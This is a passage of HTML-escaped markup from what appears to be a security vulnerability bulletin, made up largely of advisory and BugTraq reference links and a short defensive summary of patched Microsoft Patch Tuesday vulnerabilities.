style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-218"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-218&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-219"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-219&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-220"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-220&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-221"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-221&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-222"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-222&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;SecurityFocus BugTraq IDs&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48240"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48240&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48242"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48242&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48243"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48243&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48244"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48244&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48245"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48245&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48246"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48246&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48247"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48247&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48248"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48248&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48249"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48249&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48251"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48251&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48252"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48252&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48253"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48253&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48255"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48255&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48267"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48267&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48268"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48268&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48269"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48269&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48271"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48271&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48273"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48273&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48275"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48275&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48278"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48278&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48279"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48279&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48284"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48284&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48286"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48286&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48287"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48287&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48288"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48288&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48289"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48289&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48290"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48290&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48291"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48291&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48292"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48292&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48294"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48294&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48296"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48296&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48297"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48297&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48298"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48298&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48299"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48299&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48300"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48300&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48302"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48302&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48304"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48304&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48306"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48306&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48307"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48307&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48308"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48308&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48309"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48309&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48310"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48310&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.securityfocus.com/bid/48311"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48311&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;*************************************************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;(2) HIGH: Microsoft Patch Tuesday Multiple Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Affected:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Microsoft Internet Explorer&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Microsoft Windows&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Microsoft Office Excel&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Description: As part of its patch Tuesday program, Microsoft has released patches addressing vulnerabilities in multiple products.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Included in this month's patches are fixes for code-execution vulnerabilities affecting Internet Explorer. Four vulnerabilities involve memory corruption issues while handling malicious DOM manipulation of a web page; one involves a redirect to a CDL protocol, which causes a crash in Internet Explorer; and another involves a use-after-free vulnerability caused by unsafe handling of unusual values for the layout-grid-char styel property. By enticing a target to view a malicious page, an attacker can exploit these vulnerabilities in order to execute arbitrary code with the permissions of the user running the browser. Microsoft also released patches for its internal SMB client and server, Microsoft Silverlight, and Office Excel; these issues could also be used by an attacker to execute arbitrary code on a target's machine.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Status: vendor confirmed, updates available&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;References:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;Vendor Site&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.microsoft.com/"&gt;http://www.microsoft.com&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Microsoft Security Bulletins&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms11-038.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/ms11-038.mspx&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms11-039.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/ms11-039.mspx&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms11-040.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/ms11-040.mspx&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms11-041.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/ms11-041.mspx&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms11-042.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/ms11-042.mspx&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms11-043.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/ms11-043.mspx&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms11-045.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/ms11-045.mspx&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms11-048.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/ms11-048.mspx&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms11-049.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/ms11-049.mspx&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms11-050.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/ms11-050.mspx&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms11-051.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/ms11-051.mspx&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms11-052.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/ms11-052.mspx&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Zero Day Initiative Advisories&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-193"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-193&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-194"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-194&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-195"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-195&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-196"&gt;&lt;span lang="EN-US" 